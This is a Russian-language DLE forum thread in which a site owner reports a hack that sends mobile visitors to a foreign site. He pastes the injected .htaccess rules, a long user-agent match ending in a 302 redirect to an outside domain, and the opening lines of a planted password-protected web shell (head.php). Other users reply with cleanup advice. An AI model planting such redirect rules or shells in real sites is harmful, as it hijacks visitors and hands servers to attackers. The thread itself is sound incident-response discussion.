Valet777 0 Опубликовано: 28 ноября 2015 Рассказать Опубликовано: 28 ноября 2015 Здравствуйте, благодаря пользователям сайта обнаружил, что если заходить на сайт с мобильной платформы - идет редирект на неизвестный сайт. Я подумал, снова php инъекция и начал искать проблму, оказалось что проблема не в коде, а только в .htaccess файле. Я убрал вредоносные строки, заменив файл из бекапа, но я более чем уверен что это поможет не на долго, т.к где то есть дырка, а откуда дует - я не могу понять. Я прилажу файл .htaccess, возможно это что то даст. Возможно это вовсе не проблемы движка, а просто timeweb.ru - снова шалят, т.к месяце назад они уже устроили мне приятный сюрприз, дав возможность неизвестным лицам спокойно менять NS записи доменов. Пациент: itop-gear.ru Дополняю: Нашел файл head.php - который мне вообще не известен, если запускаю его с браузера - просит ввести пароль, что это такое я вообще не имею понятий. Находится в корневой папке <?PHP $auth_pass = "6q3a19fds0ea7aabbsd918s05017936b2649e85481845"; $color = "#ddff55"; $default_use_ajax = true; $default_charset = 'Windows-1251'; $default_action='Bruteforce'; $o = "здесь очень большая куча кода Вредоносный код который был в файле .htaccess RewriteEngine on RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR] RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR] RewriteCond %{HTTP:Profile} .+ [NC,OR] RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR] RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC] RewriteCond %{QUERY_STRING} !noredirect [NC] RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC] RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC] RewriteRule ^(.*)$ http://myburgerlove.ru/go/431e77f1beee06ac0f72e345b880b043 [L,R=302] Цитата Ссылка на сообщение Поделиться на других сайтах
germanydletest 457 Опубликовано: 28 ноября 2015 Рассказать Опубликовано: 28 ноября 2015 Проверяем компьютер на вирусы. Меняем пароли ftp, mysql, аккаунт хостинга, e-mail. Удаляем все сторонние модули. Выставляем правильные права на файлы и папки 755/644 (вполне достаточно для работы DLE). Цитата Ссылка на сообщение Поделиться на других сайтах
Valet777 0 Опубликовано: 28 ноября 2015 Рассказать Опубликовано: 28 ноября 2015 Автор 49 минуты назад, germanydletest сказал: Проверяем компьютер на вирусы. Меняем пароли ftp, mysql, аккаунт хостинга, e-mail. Удаляем все сторонние модули. Выставляем правильные права на файлы и папки 755/644 (вполне достаточно для работы DLE). Вы правы, все это я сделаю, но хотелось бы знать, не сталкивался ли кто с подобным явлением ? Цитата Ссылка на сообщение Поделиться на других сайтах
germanydletest 457 Опубликовано: 28 ноября 2015 Рассказать Опубликовано: 28 ноября 2015 С таким явлением сталкиваются только те, кто ставит пароли типа qwerty, не проверяет регулярно компьютеры на трояны и вирусы, выставляет права на папки/файлы 777/666, пользуется левыми модулями и не лицензионной cms. Ну или если сервера у хостера настроены криво Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 094 Опубликовано: 29 ноября 2015 Рассказать Опубликовано: 29 ноября 2015 У вас шелл на сервере. Для удаления шеллов на сервере, со стороны DLE Вам необходимо проделать следующее: 1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива. 2. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/ 3. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения. 4. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения. 5. Изменить все пароли, как к хостингу, так и к DLE. 6. Удалить в админпанели всех администраторов кроме себя. 7. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения. 8. Если используется очень старая версия скрипта, то необходимо проверить наличие патчей безопасности http://dle-news.ru/bags/ Со стороны сервера: Обновить полностью все серверное ПО и сменить все пароли. Со стороны своего компьютера: Проверить антивирусным ПО. Сменить пароли к почте. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.